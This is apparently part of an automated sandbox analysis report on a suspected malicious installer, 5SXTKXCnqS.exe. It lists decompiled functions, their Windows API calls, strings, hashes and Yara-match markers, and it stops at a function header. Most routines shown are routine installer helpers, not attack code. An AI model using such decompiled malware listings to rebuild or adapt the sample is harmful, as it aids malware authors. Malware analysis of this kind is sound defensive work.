                                                                                    0x0040289a

                                                                                    APIs
                                                                                    • GetDC.USER32(?), ref: 00401D22
                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                    • CreateFontIndirectA.GDI32(0040AF74), ref: 00401D8A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CapsCreateDeviceFontIndirect
                                                                                    • String ID:
                                                                                    • API String ID: 3272661963-0
                                                                                    • Opcode ID: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                    • Instruction ID: d83410998d1654a5337f8c322709d39cf2ce3a8a4f0330bc6585c9693e616625
                                                                                    • Opcode Fuzzy Hash: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                    • Instruction Fuzzy Hash: E1F044F1A45342AEE7016770AE0ABA93B649725306F100576F541BA1E2C5BC10149B7F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403978, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00403978(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405ADD(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E00405AC4(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420478, E00405B88(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405B88(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                    0x0040397c
                                                                                    0x00403981
                                                                                    0x00403987
                                                                                    0x0040398c
                                                                                    0x0040398c
                                                                                    0x00403994
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040399c
                                                                                    0x004039a4
                                                                                    0x004039a6
                                                                                    0x004039ac
                                                                                    0x004039ac
                                                                                    0x004039ae
                                                                                    0x004039ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004039be
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004039c0
                                                                                    0x004039c5
                                                                                    0x004039ce
                                                                                    0x004039d4
                                                                                    0x004039d9
                                                                                    0x004039ed
                                                                                    0x004039f8
                                                                                    0x00403a10
                                                                                    0x00403a16
                                                                                    0x00403a1b
                                                                                    0x00403a23
                                                                                    0x00403a44
                                                                                    0x00403a44
                                                                                    0x00403a44
                                                                                    0x00403a25
                                                                                    0x00403a27
                                                                                    0x00403a27
                                                                                    0x00403a2b
                                                                                    0x00403a32
                                                                                    0x00403a32
                                                                                    0x00403a37
                                                                                    0x00403a3d
                                                                                    0x00403a3d
                                                                                    0x00000000
                                                                                    0x00403a27
                                                                                    0x004039db
                                                                                    0x004039e0
                                                                                    0x004039e9
                                                                                    0x004039e2
                                                                                    0x004039e2
                                                                                    0x004039e2
                                                                                    0x004039e0

                                                                                    APIs
                                                                                    • SetWindowTextA.USER32(00000000,004236A0), ref: 00403A10
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 530164218-2030658151
                                                                                    • Opcode ID: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
                                                                                    • Instruction ID: 09623374405f0611f065d620c03919b516a5f167df25bc0d5edc66fe9dc562c0
                                                                                    • Opcode Fuzzy Hash: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
                                                                                    • Instruction Fuzzy Hash: F611C2B1B005109BC730DF15D880A73767DEB84716369413BE94167391C77EAE028E58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404E54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00404E54(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420488 != _t22) {
							 *0x420488 = _t22;
							E00405B66(0x4204a0, 0x424000);
							E00405AC4(0x424000, _t22);
							E0040140B(6);
							E00405B66(0x424000, 0x4204a0);
						}
						L11:
						return CallWindowProcA( *0x420490, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004047D3(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F64(0x413);
				return 0;
			}




                                                                                    0x00404e60
                                                                                    0x00404e85
                                                                                    0x00404ea5
                                                                                    0x00404ea8
                                                                                    0x00404eab
                                                                                    0x00404ec2
                                                                                    0x00404ec8
                                                                                    0x00404ecf
                                                                                    0x00404ed6
                                                                                    0x00404edd
                                                                                    0x00404ee2
                                                                                    0x00404ee8
                                                                                    0x00000000
                                                                                    0x00404ef8
                                                                                    0x00404e92
                                                                                    0x00404ee5
                                                                                    0x00404ee5
                                                                                    0x00000000
                                                                                    0x00404ee5
                                                                                    0x00404e9e
                                                                                    0x00404ea0
                                                                                    0x00000000
                                                                                    0x00404ea0
                                                                                    0x00404e66
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404e6d
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 00404E8A
                                                                                    • CallWindowProcA.USER32 ref: 00404EF8
                                                                                      • Part of subcall function 00403F64: SendMessageA.USER32 ref: 00403F76
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3748168415-3916222277
                                                                                    • Opcode ID: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                    • Instruction ID: 62f3a1a08e098275047049d4f9968a6b4933f6b7f921e7009373277d82a30415
                                                                                    • Opcode Fuzzy Hash: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                    • Instruction Fuzzy Hash: D1116D71900208BBDB21AF52DC4499B3669FB84369F00803BF6047A2E2C37C5A519BAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004024BE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029F6(0x11));
				} else {
					E004029D9(1);
					 *0x409f70 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405ADD(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nsaC26E.tmp\System.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                    0x004024be
                                                                                    0x004024be
                                                                                    0x004024c1
                                                                                    0x004024dc
                                                                                    0x004024c3
                                                                                    0x004024c5
                                                                                    0x004024ca
                                                                                    0x004024d1
                                                                                    0x004024e3
                                                                                    0x0040265c
                                                                                    0x0040265c
                                                                                    0x004024e9
                                                                                    0x004024fb
                                                                                    0x004015a6
                                                                                    0x004015a8
                                                                                    0x00000000
                                                                                    0x004015ae
                                                                                    0x004015a8
                                                                                    0x0040288e
                                                                                    0x0040289a

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                    • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsaC26E.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\nsaC26E.tmp\System.dll, xrefs: 004024CA, 004024EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileWritelstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsaC26E.tmp\System.dll
                                                                                    • API String ID: 427699356-2467108415
                                                                                    • Opcode ID: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
                                                                                    • Instruction ID: 2c1f07a632d72534084a5ac00d75746702f795d1104bf50e8da4b719a2e94720
                                                                                    • Opcode Fuzzy Hash: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
                                                                                    • Instruction Fuzzy Hash: BCF08972A44245FFD710EBB19E49EAF7668DB00348F14443BB142F51C2D6FC5982976D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040361A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0040361A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f45c;
				_t3 = E004035FF(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f45c =  *0x41f45c & 0x00000000;
				return _t3;
			}







                                                                                    0x0040361b
                                                                                    0x00403623
                                                                                    0x0040362a
                                                                                    0x0040362d
                                                                                    0x0040362d
                                                                                    0x0040362f
                                                                                    0x00403634
                                                                                    0x0040363b
                                                                                    0x00403641
                                                                                    0x00403645
                                                                                    0x00403646
                                                                                    0x0040364e

                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,00000000,7519F560,004035F1,00000000,0040342D,00000000), ref: 00403634
                                                                                    • GlobalFree.KERNEL32 ref: 0040363B
                                                                                    Strings
                                                                                    • "C:\Users\user\Desktop\5SXTKXCnqS.exe" , xrefs: 0040362C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Free$GlobalLibrary
                                                                                    • String ID: "C:\Users\user\Desktop\5SXTKXCnqS.exe"
                                                                                    • API String ID: 1100898210-3373366290
                                                                                    • Opcode ID: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                    • Instruction ID: 07f203a12dc211ea1540440f4769086933c1ddaa55d0411da1bb29b7fd771b51
                                                                                    • Opcode Fuzzy Hash: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                    • Instruction Fuzzy Hash: 8FE08C32804420ABC6216F55EC0579A7768AB48B22F028536E900BB3A083743C464BDC
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004056A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004056A0(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                    0x004056a1
                                                                                    0x004056ab
                                                                                    0x004056ad
                                                                                    0x004056b4
                                                                                    0x004056bc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004056bc
                                                                                    0x004056be
                                                                                    0x004056c3

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5SXTKXCnqS.exe,C:\Users\user\Desktop\5SXTKXCnqS.exe,80000000,00000003), ref: 004056A6
                                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5SXTKXCnqS.exe,C:\Users\user\Desktop\5SXTKXCnqS.exe,80000000,00000003), ref: 004056B4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrlen
                                                                                    • String ID: C:\Users\user\Desktop
                                                                                    • API String ID: 2709904686-1246513382
                                                                                    • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                    • Instruction ID: 6658d1b0ab05e5211e75f0b74aef41c49d7b43cb9628f8e009f88ad9fa15a52a
                                                                                    • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                    • Instruction Fuzzy Hash: C5D0A772409DB02EF30352108C04B8F7A98CF17300F0948A2E440E21D0C27C5C818FFD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 73CA10E0, Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E73CA10E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x73ca405c = _a8;
				 *0x73ca4060 = _a16;
				 *0x73ca4064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73ca4038, E73CA1556, _t52);
				_t43 =  *0x73ca405c +  *0x73ca405c * 4 << 2;
				_t17 = E73CA123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E73CA1266(E73CA12AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E73CA12D1( *_t55 - 0x30, E73CA123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x73ca4030;
								 *0x73ca4030 = _t31;
								E73CA1508(_t31 + 4,  *0x73ca4064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x73ca4030;
							if( *0x73ca4030 != 0) {
								E73CA1508( *0x73ca4064, _t34 + 4, _t43);
								_t37 =  *0x73ca4030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x73ca4030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                                    0x73ca10e7
                                                                                    0x73ca10ef
                                                                                    0x73ca1103
                                                                                    0x73ca110b
                                                                                    0x73ca1116
                                                                                    0x73ca1119
                                                                                    0x73ca1121
                                                                                    0x73ca1124
                                                                                    0x73ca1126
                                                                                    0x73ca11c4
                                                                                    0x73ca11d0
                                                                                    0x73ca112c
                                                                                    0x73ca112d
                                                                                    0x73ca112d
                                                                                    0x73ca1130
                                                                                    0x73ca1131
                                                                                    0x73ca1134
                                                                                    0x73ca1203
                                                                                    0x73ca1206
                                                                                    0x73ca119e
                                                                                    0x73ca11a4
                                                                                    0x73ca11ac
                                                                                    0x73ca11b1
                                                                                    0x73ca11b4
                                                                                    0x00000000
                                                                                    0x73ca11b4
                                                                                    0x73ca1209
                                                                                    0x73ca120a
                                                                                    0x73ca1186
                                                                                    0x73ca118c
                                                                                    0x73ca1194
                                                                                    0x00000000
                                                                                    0x73ca1194
                                                                                    0x73ca1152
                                                                                    0x73ca1153
                                                                                    0x73ca115b
                                                                                    0x73ca1168
                                                                                    0x73ca1170
                                                                                    0x73ca1179
                                                                                    0x73ca117e
                                                                                    0x73ca117e
                                                                                    0x00000000
                                                                                    0x73ca1153
                                                                                    0x73ca113a
                                                                                    0x73ca11d1
                                                                                    0x73ca11d1
                                                                                    0x73ca11d8
                                                                                    0x73ca11e5
                                                                                    0x73ca11ea
                                                                                    0x73ca11ef
                                                                                    0x73ca11f5
                                                                                    0x73ca11fb
                                                                                    0x73ca11fb
                                                                                    0x00000000
                                                                                    0x73ca11d8
                                                                                    0x73ca1140
                                                                                    0x73ca1143
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1149
                                                                                    0x73ca114c
                                                                                    0x73ca119b
                                                                                    0x00000000
                                                                                    0x73ca119b
                                                                                    0x73ca114f
                                                                                    0x73ca1150
                                                                                    0x73ca1183
                                                                                    0x00000000
                                                                                    0x73ca1183
                                                                                    0x00000000
                                                                                    0x73ca11ba
                                                                                    0x73ca11ba
                                                                                    0x00000000
                                                                                    0x73ca11c3

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.241754228.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.241748462.0000000073CA0000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241762854.0000000073CA3000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241781372.0000000073CA5000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1780285237-0
                                                                                    • Opcode ID: a5b3a2b32f3bb2d111bd05ba0331856236ae1fa523a13f4e221701c409469bbd
                                                                                    • Instruction ID: 3d7164006d30957654cde601a5cd7423c0287954d65419c89819fea4cde77152
                                                                                    • Opcode Fuzzy Hash: a5b3a2b32f3bb2d111bd05ba0331856236ae1fa523a13f4e221701c409469bbd
                                                                                    • Instruction Fuzzy Hash: B3310AB25042969FE701EF6ED988B657FF9FB05250B294515E94ACB350DB36EC00EB10
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004057B2, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004057B2(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                    0x004057be
                                                                                    0x004057c0
                                                                                    0x004057e8
                                                                                    0x004057cd
                                                                                    0x004057d2
                                                                                    0x004057dd
                                                                                    0x00000000
                                                                                    0x004057fa
                                                                                    0x004057e6
                                                                                    0x004057e6
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057D2
                                                                                    • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004057E0
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 190613189-0
                                                                                    • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                    • Instruction ID: 042c172281cf084eebf1820456e7eb749b121a10276c912c68532230cfd8689c
                                                                                    • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                    • Instruction Fuzzy Hash: BBF0A736249D51DBC2029B295C44E6FBEA4EF95355F14057EF440F3180D335AC11ABBB
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Analysis Process: 5SXTKXCnqS.exe PID: 4328 Parent PID: 5828 5SXTKXCnqS.exeCOMMON

                                                                                    Executed Functions

                                                                                    Function 00419DFD, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 37%
                                                                                    			E00419DFD(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t19;
				void* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				_t14 = _a4;
				_t30 = _a4 + 0xc48;
				E0041A950(_t28, _t14, _t30,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t19 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t29, _t32); // executed
				return _t19;
			}








                                                                                    0x00419e03
                                                                                    0x00419e0f
                                                                                    0x00419e17
                                                                                    0x00419e22
                                                                                    0x00419e3d
                                                                                    0x00419e45
                                                                                    0x00419e49

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID: 2MA$2MA
                                                                                    • API String ID: 2738559852-947276439
                                                                                    • Opcode ID: 3a78fe060d4bb7be671b855cf06e6292249fd4f13956fac42dd07e8dedaa8cc5
                                                                                    • Instruction ID: 02e287b1f01247897eaab7dfc0cb2b313a1146e2872812752bc9a88950a0021b
                                                                                    • Opcode Fuzzy Hash: 3a78fe060d4bb7be671b855cf06e6292249fd4f13956fac42dd07e8dedaa8cc5
                                                                                    • Instruction Fuzzy Hash: 18F0F4B2200108AFCB14DF89DC81EEB77A9AF8C714F118249FA5D97241C630E8518BA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 37%
